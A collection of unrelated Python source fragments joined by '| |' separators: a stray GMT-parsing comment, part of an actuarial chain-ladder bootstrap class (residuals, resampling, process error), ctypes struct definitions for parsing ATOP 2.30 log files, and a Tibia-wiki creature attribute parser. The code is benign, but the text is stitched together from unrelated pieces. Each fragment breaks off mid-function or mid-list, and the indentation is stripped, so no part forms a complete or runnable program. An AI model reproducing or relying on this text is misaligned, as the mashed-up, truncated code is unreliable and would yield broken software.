## gmtStr = para[timeStr.start():timeStr.end()]
## gmt = gmtStr.strip("...").replace("Z","")
## gmtHour = int(gmt)/100
# This code could bomb in the unlikely | |
along the
latest diagonal.
Parameters
----------
sel: str
The ldf average to select from ``triangle._CumTriangle.a2a_avgs``.
Defaults to "all-weighted".
Returns
-------
pd.DataFrame
"""
ldfs = self._ldfs(sel=sel)
fitted_tri_cum = self.tri.copy(deep=True)
for ii in range(fitted_tri_cum.shape[0]):
iterrow = fitted_tri_cum.iloc[ii, :]
if iterrow.isnull().any():
# Find first NaN element in iterrow.
nan_hdr = iterrow.isnull()[iterrow.isnull()==True].index[0]
nan_idx = fitted_tri_cum.columns.tolist().index(nan_hdr)
init_idx = nan_idx - 1
else:
# If here, iterrow is the most mature exposure period.
init_idx = fitted_tri_cum.shape[1] - 1
# Set to NaN any development periods earlier than init_idx.
fitted_tri_cum.iloc[ii, :init_idx] = np.NaN
# Iterate over rows, undeveloping triangle from latest diagonal.
for j in range(fitted_tri_cum.iloc[ii, :init_idx].size, 0, -1):
prev_col_idx, curr_col_idx, curr_ldf_idx = j, j - 1, j - 1
prev_col_val = fitted_tri_cum.iloc[ii, prev_col_idx]
curr_ldf_val = ldfs.iloc[curr_ldf_idx]
fitted_tri_cum.iloc[ii, curr_col_idx] = (prev_col_val / curr_ldf_val)
return(fitted_tri_cum)
@staticmethod
def _tri_fit_incr(fitted_tri_cum):
"""
Return the fitted incremental triangle.
Parameters
----------
fitted_tri_cum: pd.DataFrame
Typically the output from ``self._tri_fit_cum``.
Returns
-------
pd.DataFrame
"""
tri = fitted_tri_cum.diff(axis=1)
tri.iloc[:, 0] = fitted_tri_cum.iloc[:, 0]
return(tri)
def _resid_us(self, fitted_tri_incr):
"""
Return unscaled Pearson residuals, given by
$r_{us} = \frac{I - m}{\sqrt{|m|}}$, where $r_{us}$ represents the
unscaled Pearson residuals, $I$ the actual incremental losses and $m$
the fitted incremental losses.
Parameters
----------
fitted_tri_incr: pd.DataFrame
Typically the output from ``self._tri_fit_incr``.
Returns
-------
pd.DataFrame
"""
# I represents actual incremental losses, m fitted incremental losses.
I = self.tri.to_incr()
m = fitted_tri_incr
return((I - m) / np.sqrt(m.abs()))
def _resid_adj(self, resid_us):
"""
Compute and return the adjusted Pearson residuals, given by
$r_{adj} = \sqrt{\frac{N}{dof}} * r_{us}$, where $r_adj$ represents
the adjusted Pearson residuals, $N$ the number of triangle cells,
$dof$ the degress of freedom and $r_{us}$ the unscaled Pearson
residuals.
Parameters
----------
resid_us: pd.DataFrame
Unscaled Pearson residuals, typically output by
``self._resid_us``.
Returns
-------
pd.DataFrame
"""
return(np.sqrt(self.tri.nbr_cells / self.dof) * resid_us)
@staticmethod
def _sampling_dist(resid_adj):
"""
Return ``resid_adj`` as a 1-dimensional array, which will be sampled
from with replacement in order to produce synthetic triangles for
bootstrapping. Any NaN's and 0's present in ``resid_adj`` will not be
present in the returned array.
Parameters
----------
resid_adj: pd.DataFrame
Adjusted Pearson residuals, typically output by
``self._resid_adj``.
Returns
-------
np.ndarray
"""
resid_ = resid_adj.iloc[:-1,:-1].values.ravel()
return(resid_[np.logical_and(~np.isnan(resid_), resid_!=0)])
def _bs_samples(self, sampling_dist, fitted_tri_incr, sims=1000,
neg_handler="all", parametric=False, random_state=None):
"""
Return DataFrame containing sims resampled-with-replacement
incremental loss triangles if ``parametric=False``, otherwise
random variates from a normal distribution with mean zero and
variance derived from ``resid_adj``. Randomly generated incremental
data gets cumulated in preparation for ldf calculation in next
step.
Parameters
----------
sampling_dist: np.ndarray
The residuals from the fitted incremental triangle coerced
into a one-dimensional numpy array.
fitted_tri_incr: pd.DataFrame
The incremental triangle fitted using backwards recursion.
Typically the output of ``self._tri_fit_incr``.
sims: int
The number of bootstrap simulations to run. Defaults to 1000.
neg_handler: str
If ``neg_handler="first"``, any first development period negative
cells will be coerced to +1. If ``neg_handler="all"``, the minimum
value in all triangle cells is identified (identified as 'MIN_CELL').
If MIN_CELL is less than or equal to 0, (MIN_CELL + X = +1.0) is
solved for X. X is then added to every other cell in the triangle,
resulting in all triangle cells having a value strictly greater
than 0.
parametric: bool
If True, fit standardized residuals to a normal distribution, and
sample from the parameterized distribution. Otherwise, bootstrap
procedure proceeds by sampling with replacement from the array
of standardized residuals. Defaults to False.
random_state: np.random.RandomState
If int, random_state is the seed used by the random number
generator; If RandomState instance, random_state is the random
number generator; If None, the random number generator is the
RandomState instance used by np.random.
Returns
-------
pd.DataFrame
"""
if random_state is not None:
if isinstance(random_state, int):
prng = RandomState(random_state)
elif isinstance(random_state, RandomState):
prng = random_state
else:
prng = RandomState()
sampling_dist = sampling_dist.flatten()
fti = fitted_tri_incr.reset_index(drop=False).rename({"index":"origin"}, axis=1)
dfm = pd.melt(fti, id_vars=["origin"], var_name="dev", value_name="value")
dfm = dfm[~np.isnan(dfm["value"])].astype(
{"origin":np.int_, "dev":np.int_, "value":np.float_}
)
# Handle first period negative cells as specified by `neg_handler`.
if np.any(dfm["value"]<0):
if neg_handler=="first":
dfm["value"] = np.where(
np.logical_and(dfm["dev"].values==1, dfm["value"].values<0),
1., dfm["value"].values
)
elif neg_handler=="all":
# Obtain reference to minimum triangle cell value, then
# add the absolute value of that amount plus one to all
# other triangle cells.
add2cells = np.abs(dfm["value"].min()) + 1
dfm["value"] = dfm["value"] + add2cells
else:
raise ValueError("`neg_handler` must be in ['first', 'all'].")
dfi = self.tri.to_tbl(drop_nas=False).drop("value", axis=1)
dfp = dfi.merge(dfm, how="outer", on=["origin", "dev"])
dfp["rectype"] = np.where(np.isnan(dfp["value"].values), "forecast", "actual")
dfp = dfp.rename({"value":"incr"}, axis=1)
dfp["incr_sqrt"] = np.sqrt(dfp["incr"].values)
dfrtypes = {"origin":np.int, "dev":np.int, "incr":np.float,
"incr_sqrt":np.float, "rectype":np.str,}
dfrcols = ["origin", "dev", "incr", "rectype", "incr_sqrt"]
# Replicate dfp sims times then redefine datatypes.
dfr = pd.DataFrame(np.tile(dfp, (sims, 1)), columns=dfrcols).astype(dfrtypes)
# Assign simulation identifier to each record in dfr.
dfr["sim"] = np.divmod(dfr.index, self.tri.shape[0] * self.tri.shape[1])[0]
sample_size = dfr.shape[0]
if parametric:
# Sample random residuals from normal distribution with zero mean.
dfr["resid"] = prng.normal(
loc=0, scale=sampling_dist.std(ddof=1), size=sample_size
)
else:
# Sample random residual from adjusted pearson residuals.
dfr["resid"] = prng.choice(
sampling_dist, sample_size, replace=True
)
# Calcuate resampled incremental and cumulative losses.
dfr["resid"] = np.where(dfr["rectype"].values=="forecast", np.NaN, dfr["resid"].values)
dfr = dfr.sort_values(by=["sim", "origin", "dev"]).reset_index(drop=True)
dfr["samp_incr"] = dfr["incr"].values + dfr["resid"].values * dfr["incr_sqrt"].values
dfr["samp_cum"] = dfr.groupby(["sim", "origin"], as_index=False)["samp_incr"].cumsum()
return(dfr.reset_index(drop=True))
def _bs_ldfs(self, dfsamples):
"""
Compute and return loss development factors for each set of
synthetic loss data. This method is intended for internal use
only.
Parameters
----------
dfsamples: pd.DataFrame
Output from ``self._bs_samples``.
Returns
-------
pd.DataFrame
"""
keepcols = ["sim", "origin", "dev", "samp_cum", "last_origin"]
dflvi = self.tri.clvi.reset_index(drop=False)
dflvi = dflvi.rename(
{"index":"dev", "origin":"last_origin", "row_offset":"origin_offset"}, axis=1)
dfinit = dfsamples.merge(dflvi, how="left", on=["dev"])
dfinit = dfinit[keepcols].sort_values(by=["sim", "dev", "origin"])
df = dfinit[~np.isnan(dfinit["samp_cum"])].reset_index(drop=True)
df["_aggdev2"] = np.where(
df["origin"].values==df["last_origin"].values, 0, df["samp_cum"].values)
df2 = df.groupby(["sim", "dev"], as_index=False)[["samp_cum", "_aggdev2"]].sum().rename(
{"samp_cum":"_aggdev1"}, axis=1)
df2["_aggdev2"] = df2["_aggdev2"].shift(periods=1)
df2["dev"] = df2["dev"].shift(periods=1)
dfldfs = df2[df2["_aggdev2"]!=0].dropna(how="any")
dfldfs["dev"] = dfldfs["dev"].astype(np.int)
dfldfs["ldf"] = dfldfs["_aggdev1"] / dfldfs["_aggdev2"]
return(dfldfs[["sim", "dev", "ldf"]].reset_index(drop=True))
@staticmethod
def _bs_forecasts(dfcombined, scale_param):
"""
Populate lower-right of each simulated triangle using values from
``self._bs_samples`` and development factors from ``self._bs_ldfs``.
Parameters
----------
dfcombined: pd.DataFrame
Combination of ``self._bs_samples``, ``self._bs_ldfs`` and
``self.tri.latest_by_origin``.
scale_param: float
the sum of the squared unscaled Pearson residuals over the
degrees of freedom. Computed within ``self._scale_param``.
Returns
-------
pd.DataFrame
"""
min_origin_year = dfcombined["origin"].values.min()
dfcombined["_l_init_indx"] = np.where(
dfcombined["dev"].values>=dfcombined["l_act_dev"].values, dfcombined.index.values, -1)
dfacts = dfcombined[(dfcombined["origin"].values==min_origin_year) | (dfcombined["_l_init_indx"].values==-1)]
dffcst = dfcombined[~dfcombined.index.isin(dfacts.index)].sort_values(by=["sim", "origin", "dev"])
dffcst["_l_act_indx"] = dffcst.groupby(["sim", "origin"])["_l_init_indx"].transform("min")
dffcst["l_act_cum"] = dffcst.lookup(dffcst["_l_act_indx"].values, ["samp_cum"] * dffcst.shape[0])
dffcst["_cum_ldf"] = dffcst.groupby(["sim", "origin"])["ldf"].transform("cumprod").shift(periods=1)
dffcst["_samp_cum2"] = dffcst["l_act_cum"].values * dffcst["_cum_ldf"].values
dffcst["_samp_cum2"] = np.where(np.isnan(dffcst["_samp_cum2"].values), 0, dffcst["_samp_cum2"].values)
dffcst["cum_final"] = np.where(np.isnan(dffcst["samp_cum"].values), 0, dffcst["samp_cum"].values) + dffcst["_samp_cum2"].values
# Combine forecasts with actuals then compute incremental losses by sim and origin.
dffcst = dffcst.drop(labels=["samp_cum", "samp_incr"], axis=1).rename(columns={"cum_final":"samp_cum"})
dfsqrd = pd.concat([dffcst, dfacts], sort=True).sort_values(by=["sim", "origin", "dev"])
dfsqrd["_dev1_ind"] = (dfsqrd["dev"].values==1) * 1
dfsqrd["_incr_dev1"] = dfsqrd["_dev1_ind"].values * dfsqrd["samp_cum"].values
dfsqrd["_incr_dev2"] = dfsqrd.groupby(["sim", "origin"])["samp_cum"].diff(periods=1)
dfsqrd["_incr_dev2"] = np.where(np.isnan(dfsqrd["_incr_dev2"].values), 0, dfsqrd["_incr_dev2"].values)
dfsqrd["samp_incr"] = dfsqrd["_incr_dev1"].values + dfsqrd["_incr_dev2"].values
dfsqrd["var"] = np.abs(dfsqrd["samp_incr"].values * scale_param)
dfsqrd["sign"] = np.where(dfsqrd["samp_incr"].values > 0, 1, -1)
dfsqrd = dfsqrd.drop(labels=[i for i in dfsqrd.columns if i.startswith("_")], axis=1)
return(dfsqrd.sort_values(by=["sim", "origin", "dev"]).reset_index(drop=True))
@staticmethod
def _bs_process_error(dfforecasts, scale_param, procdist="gamma", random_state=None):
"""
Incorporate process error by simulating each incremental future
loss from ``procdist``. The mean is set to the forecast incremental
loss amount and variance to `mean * self.scale_param`.
The parameters for ``procdist`` must be positive. Since the mean
and variance used to parameterize ``procdist`` depend on the
resampled incremental losses, it is necessary to incorporate logic
to address the possibility of negative incremental losses arising
in the resampling stage. The approach used to handle negative
incremental values is described in Shapland[1], and replaces the
distribution mean with the absolute value of the mean, and the
variance to the absolute value of the mean multiplied by
``self.scale_param``.
Parameters
----------
forecasts: pd.DataFrame
DateFrame of bootstraps forecasts generated within
``self._bs_forecasts``.
scale_param: float
the sum of the squared unscaled Pearson residuals over the
degrees of freedom. Computed within ``self._scale_param``.
procdist: str
Specifies the distribution used to incorporate process error.
Currently, can only be set to "gamma". Any other distribution
will result in an error. Future release will also allow
over-dispersed poisson ("odp"). If in the future ``procdist``
is set | |
"""Structs and definitions used serialize/deserialize ATOP statistics directly from log files.
Structs are declared in a way that will help provide as close to a 1 to 1 match as possible for debuggability
and maintenance. The _fields_ of every struct match their original name, however the struct names have been updated
to match python CamelCase standards. Each struct includes the following to help identify the original source:
C Name: utsname
C Location: sys/utsname.h
Struct ordering and visual whitespace in the _fields_ are left to help match the original source in readability.
If structs match exactly from a previous version, they are reused via aliasing.
See https://github.com/Atoptool/atop for more information and references to the C process source code.
Using schemas and structs from ATOP 2.30.
"""
import ctypes
from pyatop.structs import atop_126
# Disable the following pylint warnings to allow the variables and classes to match the style from the C.
# This helps with maintainability and cross-referencing.
# pylint: disable=invalid-name,too-few-public-methods
# Definitions from time.h
time_t = ctypes.c_long
# Definitions from atop.h
count_t = ctypes.c_longlong
ACCTACTIVE = 0x00000001
PATCHSTAT = 0x00000002
IOSTAT = 0x00000004
PATCHACCT = 0x00000008
# Definitions from sys/types.h
off_t = ctypes.c_long
# Definitions from photoproc.h
PNAMLEN = 15
CMDLEN = 255
# Definitions from photosyst.h
MAXCPU = 2048
MAXDSK = 1024
MAXLVM = 2048
MAXMDD = 256
MAXINTF = 128
MAXCONTAINER = 128
MAXNFSMOUNT = 64
MAXDKNAM = 32
UTSName = atop_126.UTSName
class Header(ctypes.Structure):
"""Top level struct to describe information about the system running ATOP and the log file itself.
Field descriptions from atop:
aversion Creator atop version with MSB.
future1 Can be reused.
future2 Can be reused.
rawheadlen Length of struct rawheader.
rawreclen Length of struct rawrecord.
hertz Clock interrupts per second.
sfuture[6] Future use.
sstatlen Length of struct sstat.
tstatlen Length of struct tstat.
utsname Info about this system.
C Name: rawheader
C Location: rawlog.c
"""
_fields_ = [
('magic', ctypes.c_uint),
('aversion', ctypes.c_ushort),
('future1', ctypes.c_ushort),
('future2', ctypes.c_ushort),
('rawheadlen', ctypes.c_ushort),
('rawreclen', ctypes.c_ushort),
('hertz', ctypes.c_ushort),
('sfuture', ctypes.c_ushort * 6),
('sstatlen', ctypes.c_uint),
('tstatlen', ctypes.c_uint),
('utsname', UTSName),
('cfuture', ctypes.c_char * 8),
('pagesize', ctypes.c_uint),
('supportflags', ctypes.c_int),
('osrel', ctypes.c_int),
('osvers', ctypes.c_int),
('ossub', ctypes.c_int),
('ifuture', ctypes.c_int * 6),
]
def check_compatibility(self) -> None:
"""Verify if the loaded values are compatible with this header version.
Raises:
ValueError if not compatible.
"""
compatible = [
self.sstatlen == ctypes.sizeof(SStat),
self.tstatlen == ctypes.sizeof(TStat),
self.rawheadlen == ctypes.sizeof(Header),
self.rawreclen == ctypes.sizeof(Record),
]
if not all(compatible):
raise ValueError(f'File has incompatible atop format. Struct length evaluations: {compatible}')
def get_version(self) -> float:
"""Convert the raw version into a semantic version.
Returns:
version: The final major.minor version from the header aversion.
"""
major = (self.aversion >> 8) & 0x7f
minor = self.aversion & 0xff
version = float(f'{major}.{minor}')
return version
class Record(ctypes.Structure):
"""Top level struct to describe basic process information, and the following SStat and TStat structs.
Field descriptions from atop:
curtime Current time (epoch).
flags Various flags.
sfuture[3] Future use.
scomplen Length of compressed sstat.
pcomplen Length of compressed tstats.
interval Interval (number of seconds).
ndeviat Number of tasks in list.
nactproc Number of processes in list.
ntask Total number of tasks.
totproc Total number of processes.
totrun Number of running threads.
totslpi Number of sleeping threads(S).
totslpu Number of sleeping threads(D).
totzomb Number of zombie processes.
nexit Number of exited processes.
noverflow Number of overflow processes.
ifuture[6] Future use.
C Name: rawrecord
C Location: rawlog.c
"""
_fields_ = [
('curtime', time_t),
('flags', ctypes.c_ushort),
('sfuture', ctypes.c_ushort * 3),
('scomplen', ctypes.c_uint),
('pcomplen', ctypes.c_uint),
('interval', ctypes.c_uint),
('ndeviat', ctypes.c_uint),
('nactproc', ctypes.c_uint),
('ntask', ctypes.c_uint),
('totproc', ctypes.c_uint),
('totrun', ctypes.c_uint),
('totslpi', ctypes.c_uint),
('totslpu', ctypes.c_uint),
('totzomb', ctypes.c_uint),
('nexit', ctypes.c_uint),
('noverflow', ctypes.c_uint),
('ifuture', ctypes.c_uint * 6),
]
class MemStat(ctypes.Structure):
"""Embedded struct to describe basic memory information.
C Name: memstat
C Location: photosyst.h
C Parent: sstat
"""
_fields_ = [
('physmem', count_t),
('freemem', count_t),
('buffermem', count_t),
('slabmem', count_t),
('cachemem', count_t),
('cachedrt', count_t),
('totswap', count_t),
('freeswap', count_t),
('pgscans', count_t),
('pgsteal', count_t),
('allocstall', count_t),
('swouts', count_t),
('swins', count_t),
('commitlim', count_t),
('committed', count_t),
('shmem', count_t),
('shmrss', count_t),
('shmswp', count_t),
('slabreclaim', count_t),
('tothugepage', count_t),
('freehugepage', count_t),
('hugepagesz', count_t),
('vmwballoon', count_t),
('cfuture', count_t * 8),
]
FreqCnt = atop_126.FreqCnt
class PerCPU(ctypes.Structure):
"""Embedded struct to describe per processor usage information.
C Name: percpu
C Location: photosyst.h
C Parent: cpustat
"""
_fields_ = [
('cpunr', ctypes.c_int),
('stime', count_t),
('utime', count_t),
('ntime', count_t),
('itime', count_t),
('wtime', count_t),
('Itime', count_t),
('Stime', count_t),
('steal', count_t),
('guest', count_t),
('freqcnt', FreqCnt),
('cfuture', count_t * 4),
]
class CPUStat(ctypes.Structure):
"""Embedded struct to describe basic overall processor information.
C Name: cpustat
C Location: photosyst.h
C Parent: sstat
"""
_fields_ = [
('nrcpu', count_t),
('devint', count_t),
('csw', count_t),
('nprocs', count_t),
('lavg1', ctypes.c_float),
('lavg5', ctypes.c_float),
('lavg15', ctypes.c_float),
('cfuture', count_t * 4),
('all', PerCPU),
('cpu', PerCPU * MAXCPU)
]
class PerDSK(ctypes.Structure):
"""Embedded struct to describe per disk information.
C Name: perdsk
C Location: photosyst.h
C Parent: dskstat
"""
_fields_ = [
('name', ctypes.c_char * MAXDKNAM),
('nread', count_t),
('nrsect', count_t),
('nwrite', count_t),
('nwsect', count_t),
('io_ms', count_t),
('avque', count_t),
('cfuture', count_t * 4),
]
class DSKStat(ctypes.Structure):
"""Embedded struct to describe overall disk information.
C Name: dskstat
C Location: photosyst.h
C Parent: sstat
"""
_fields_ = [
('ndsk', ctypes.c_int),
('nmdd', ctypes.c_int),
('nlvm', ctypes.c_int),
('dsk', PerDSK * MAXDSK),
('mdd', PerDSK * MAXMDD),
('lvm', PerDSK * MAXLVM),
]
class PerIntf(ctypes.Structure):
"""Embedded struct to describe per interface statistics.
C Name: perintf
C Location: photosyst.h
C Parent: intfstat
"""
_fields_ = [
('name', ctypes.c_char * 16),
('rbyte', count_t),
('rpack', count_t),
('rerrs', count_t),
('rdrop', count_t),
('rfifo', count_t),
('rframe', count_t),
('rcompr', count_t),
('rmultic', count_t),
('rfuture', count_t * 4),
('sbyte', count_t),
('spack', count_t),
('serrs', count_t),
('sdrop', count_t),
('sfifo', count_t),
('scollis', count_t),
('scarrier', count_t),
('scompr', count_t),
('sfuture', count_t * 4),
('type', ctypes.c_char),
('speed', ctypes.c_long),
('speedp', ctypes.c_long),
('duplex', ctypes.c_char),
('cfuture', count_t * 4),
]
class IntfStat(ctypes.Structure):
"""Embedded struct to describe overall interface statistics.
C Name: intfstat
C Location: photosyst.h
C Parent: sstat
"""
_fields_ = [
('nrintf', ctypes.c_int),
('intf', PerIntf * MAXINTF),
]
class PerNFSMount(ctypes.Structure):
"""Embedded struct to describe per NFS mount statistics.
C Name: pernfsmount
C Location: photosyst.h
C Parent: nfsmounts
"""
_fields_ = [
('name', ctypes.c_char * 128),
('age', count_t),
('bytesread', count_t),
('byteswrite', count_t),
('bytesdread', count_t),
('bytesdwrite', count_t),
('bytestotread', count_t),
('bytestotwrite', count_t),
('pagesmread', count_t),
('pagesmwrite', count_t),
('future', count_t * 8),
]
class Server(ctypes.Structure):
"""Embedded struct to describe NFS server information from the 'NFS' parseable.
C Name: server
C Location: photoproc.h
C Parent: nfsstat
"""
_fields_ = [
('netcnt', count_t),
('netudpcnt', count_t),
('nettcpcnt', count_t),
('nettcpcon', count_t),
('rpccnt', count_t),
('rpcbadfmt', count_t),
('rpcbadaut', count_t),
('rpcbadcln', count_t),
('rpcread', count_t),
('rpcwrite', count_t),
('rchits', count_t),
('rcmiss', count_t),
('rcnoca', count_t),
('nrbytes', count_t),
('nwbytes', count_t),
('future', count_t * 8),
]
class Client(ctypes.Structure):
"""Embedded struct to describe NFS client information from the 'NFC' parseable.
C Name: client
C Location: photoproc.h
C Parent: nfsstat
"""
_fields_ = [
('rpccnt', count_t),
('rpcretrans', count_t),
('rpcautrefresh', count_t),
('rpcread', count_t),
('rpcwrite', count_t),
('future', count_t * 8),
]
class NFSMounts(ctypes.Structure):
"""Embedded struct to describe NFS mount information from the 'NFM' parseable.
C Name: mfsmounts
C Location: photoproc.h
C Parent: nfsstat
"""
_fields_ = [
('nrmounts', ctypes.c_int),
('pernfsmount', PerNFSMount * MAXNFSMOUNT)
]
class NFSStat(ctypes.Structure):
"""Embedded struct to describe NFS subsystem.
C Name: nfstat
C Location: photosyst.h
C Parent: sstat
"""
_fields_ = [
('server', Server),
('client', Client),
('nfsmounts', NFSMounts),
]
class PerContainer(ctypes.Structure):
"""Embedded struct to describe per container statistics.
C Name: percontainer
C Location: photosyst.h
C Parent: constat
"""
_fields_ = [
('ctid', ctypes.c_ulong),
('numproc', ctypes.c_ulong),
('system', count_t),
('user', count_t),
('nice', count_t),
('uptime', count_t),
('physpages', count_t),
]
class ContStat(ctypes.Structure):
"""Embedded struct to describe container subsystem.
C Name: contstat
C Location: photosyst.h
C Parent: sstat
"""
_fields_ = [
('nrcontainer', ctypes.c_int),
('cont', PerContainer * MAXCONTAINER),
]
WWWStat = atop_126.WWWStat
IPv4Stats = atop_126.IPv4Stats
ICMPv4Stats = atop_126.ICMPv4Stats
UDPv4Stats = atop_126.UDPv4Stats
TCPStats = atop_126.TCPStats
IPv6Stats = atop_126.IPv6Stats
ICMPv6Stats = atop_126.ICMPv6Stats
UDPv6Stats = atop_126.UDPv6Stats
NETStat = atop_126.NETStat
class SStat(ctypes.Structure):
"""Top level struct to describe various subsystems.
C Name: sstat
C Location: photosyst.h
"""
_fields_ = [
('cpu', CPUStat),
('mem', MemStat),
('net', NETStat),
('intf', IntfStat),
('dsk', DSKStat),
('nfs', NFSStat),
('cfs', ContStat),
('www', WWWStat),
]
class GEN(ctypes.Structure):
"""Embedded struct to describe a single process' general information from the 'GEN' parseable.
C Name: gen
C Location: photoproc.h
C Parent: tstat
"""
_fields_ = [
('tgid', ctypes.c_int),
('pid', ctypes.c_int),
('ppid', ctypes.c_int),
('ruid', ctypes.c_int),
('euid', ctypes.c_int),
('suid', ctypes.c_int),
('fsuid', | |
# Copyright 2016 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
from urlhelpers import getFeaturedImageUrl
from parseattribs import parseLoot
from format import formatTitle
numberRegex = re.compile('([0-9]+[,.]?[0-9]*[,.]?[0-9]*[,.]?[0-9]*[,.]?[0-9]*)')
def getBoolean(attributes, attrib, default=False):
if attrib not in attributes:
return default
return attributes[attrib].strip().lower() == 'yes'
def getInteger(attributes, attrib):
if attrib not in attributes:
return None
match = numberRegex.search(attributes[attrib])
if match != None:
return int(match.groups()[0].replace(',','').replace('.',''))
return None
def getMaxInteger(attributes, attrib):
if attrib not in attributes:
return None
maxint = None
for integers in numberRegex.findall(attributes[attrib]):
val = int(integers.replace(',','').replace('.',''))
if maxint == None or val > maxint:
maxint = val
return maxint
itemmap = dict()
itemmap['sais'] = 'sai'
itemmap['gold coins'] = 'gold coin'
itemmap['platinum coins'] = 'platinum coin'
itemmap['rusty armor'] = 'rusty armor'
itemmap['clusters of solace'] = 'cluster of solace'
itemmap['the lethal lissy\'s shirt'] = 'lethal lissy\'s shirt'
itemmap['music sheet'] = 'music sheet'
itemmap['picture'] = 'picture'
itemmap['part of a jester doll'] = 'part of a jester doll'
lootListRegex = re.compile('<table class="loot_list sortable">')
wikiURLRegex = re.compile('<td><a href="/wiki/([^"]+)"')
questionMarkRegex = re.compile('([^?]*)')
lootChanceRegex = re.compile('([0-9]+(?:[.][0-9]+)?)[%]')
abilityRegex = re.compile('<[^>]*>')
lootCountRegex = re.compile('<td class="loot_list_no_border">([0-9]+)[-]([0-9]+)</td>')
def filterItemName(item_name):
item_name = item_name.lstrip('/wiki/').replace('_', ' ').replace('%27', '\'').replace('%C3%B1', 'n').lower()
item_name = re.sub(r' \([^(]*\)', '', item_name).strip() #remove parenthesis
match = questionMarkRegex.search(item_name)
item_name = match.groups()[0]
if item_name in itemmap: item_name = itemmap[item_name]
return item_name
passList = ['Liberty Bay Fortress', 'Kraknaknork\'s Dimension', 'Snow White Room', 'Glooth']
def parseCreature(title, attributes, c, creaturedrops, getURL, parseImage = False):
if title in passList:
return False
name = title
if 'actualname' in attributes and len(attributes['actualname']) > 0:
name = formatTitle(attributes['actualname'])
elif 'name' in attributes and len(attributes['name']) > 0:
name = formatTitle(attributes['name'])
hp = getInteger(attributes, 'hp')
exp = None
if 'exp' in attributes:
try: exp = int(attributes['exp'])
except: pass
summon = None
if 'summon' in attributes:
try: summon = int(attributes['summon'])
except: pass
convince = None
if 'convince' in attributes:
try: convince = int(attributes['convince'])
except: pass
bestiaryname = None
if 'bestiaryname' in attributes:
bestiaryname = attributes['bestiaryname']
bestiarytext = None
if 'bestiarytext' in attributes:
bestiarytext = attributes['bestiarytext']
bestiarylevel = None
if 'bestiarylevel' in attributes:
bestiarylevel = attributes['bestiarylevel']
occurrence = None
if 'occurrence' in attributes:
occurrence = attributes['occurrence']
sounds = None
if 'sounds' in attributes:
sounds = attributes['sounds']
location = None
if 'location' in attributes:
location = attributes['location']
implemented = None
if 'implemented' in attributes:
implemented = attributes['implemented']
illusionable = getBoolean(attributes,'illusionable')
pushable = getBoolean(attributes,'pushable')
pushes = getBoolean(attributes,'pushes')
paralysable = getBoolean(attributes,'paraimmune')
senseinvis = getBoolean(attributes,'senseinvis', True)
armor = getInteger(attributes,'armor')
maxdmg = getMaxInteger(attributes,'maxdmg')
physical = getInteger(attributes,'physicalDmgMod')
holy = getInteger(attributes,'holyDmgMod')
heal = getInteger(attributes,'healMod')
death = getInteger(attributes,'deathDmgMod')
fire = getInteger(attributes,'fireDmgMod')
energy = getInteger(attributes,'energyDmgMod')
ice = getInteger(attributes,'iceDmgMod')
earth = getInteger(attributes,'earthDmgMod')
drown = getInteger(attributes,'drownDmgMod')
lifedrain = getInteger(attributes,'hpDrainDmgMod')
speed = getInteger(attributes,'speed')
runsat = getInteger(attributes,'runsat')
boss = False
if 'isboss' in attributes and attributes['isboss'].lower().strip() == 'yes':
boss = True
notes = None
if 'notes' in attributes:
# first take care of [[Fire Rune||Great Fireball]] => Great Fireball
b = re.sub(r'\[\[[^]|]+\|([^]]+)\]\]', '\g<1>', attributes['notes'])
# then take care of [[Fire Rune]] => Fire Rune
b = re.sub(r'\[\[([^]]+)\]\]', '\g<1>', b)
# sometimes there are links in single brackets [http:www.link.com] => remove htem
b = re.sub(r'\[[^]]+\]', '', b)
# if there are brackets without numbers, remove them (maybe not necessary)
b = re.sub(r'\(([^0-9]+)\)', '', b)
# replace double spaces with single spaces
b = b.replace(' ', ' ')
# if there are commas in brackets (300-500, Fire Damage) => replace the comma with a semicolon (for later splitting purposes)
notes = re.sub(r'(\([^,)]+)\,([^)]+\))', '\g<1>;\g<2>', b)
abilities = None
if 'abilities' in attributes:
# first take care of [[Fire Rune||Great Fireball]] => Great Fireball
b = re.sub(r'\[\[[^]|]+\|([^]]+)\]\]', '\g<1>', attributes['abilities'])
# then take care of [[Fire Rune]] => Fire Rune
b = re.sub(r'\[\[([^]]+)\]\]', '\g<1>', b)
# sometimes there are links in single brackets [http:www.link.com] => remove htem
b = re.sub(r'\[[^]]+\]', '', b)
# if there are brackets without numbers, remove them (maybe not necessary)
b = re.sub(r'\(([^0-9]+)\)', '', b)
# replace double spaces with single spaces
b = b.replace(' ', ' ')
# if there are commas in brackets (300-500, Fire Damage) => replace the comma with a semicolon (for later splitting purposes)
abilities = re.sub(r'(\([^,)]+)\,([^)]+\))', '\g<1>;\g<2>', b)
strategy = None
if 'strategy' in attributes:
# first take care of [[Fire Rune||Great Fireball]] => Great Fireball
b = re.sub(r'\[\[[^]|]+\|([^]]+)\]\]', '\g<1>', attributes['strategy'])
# then take care of [[Fire Rune]] => Fire Rune
b = re.sub(r'\[\[([^]]+)\]\]', '\g<1>', b)
# sometimes there are links in single brackets [http:www.link.com] => remove htem
b = re.sub(r'\[[^]]+\]', '', b)
# if there are brackets without numbers, remove them (maybe not necessary)
b = re.sub(r'\(([^0-9]+)\)', '', b)
# replace double spaces with single spaces
b = b.replace(' ', ' ')
# if there are commas in brackets (300-500, Fire Damage) => replace the comma with a semicolon (for later splitting purposes)
strategy = re.sub(r'(\([^,)]+)\,([^)]+\))', '\g<1>;\g<2>', b)
behaviour = None
if 'behaviour' in attributes:
# first take care of [[Fire Rune||Great Fireball]] => Great Fireball
b = re.sub(r'\[\[[^]|]+\|([^]]+)\]\]', '\g<1>', attributes['behaviour'])
# then take care of [[Fire Rune]] => Fire Rune
b = re.sub(r'\[\[([^]]+)\]\]', '\g<1>', b)
# sometimes there are links in single brackets [http:www.link.com] => remove htem
b = re.sub(r'\[[^]]+\]', '', b)
# if there are brackets without numbers, remove them (maybe not necessary)
b = re.sub(r'\(([^0-9]+)\)', '', b)
# replace double spaces with single spaces
b = b.replace(' ', ' ')
# if there are commas in brackets (300-500, Fire Damage) => replace the comma with a semicolon (for later splitting purposes)
behaviour = re.sub(r'(\([^,)]+)\,([^)]+\))', '\g<1>;\g<2>', b)
image = None
itemHTML = ''
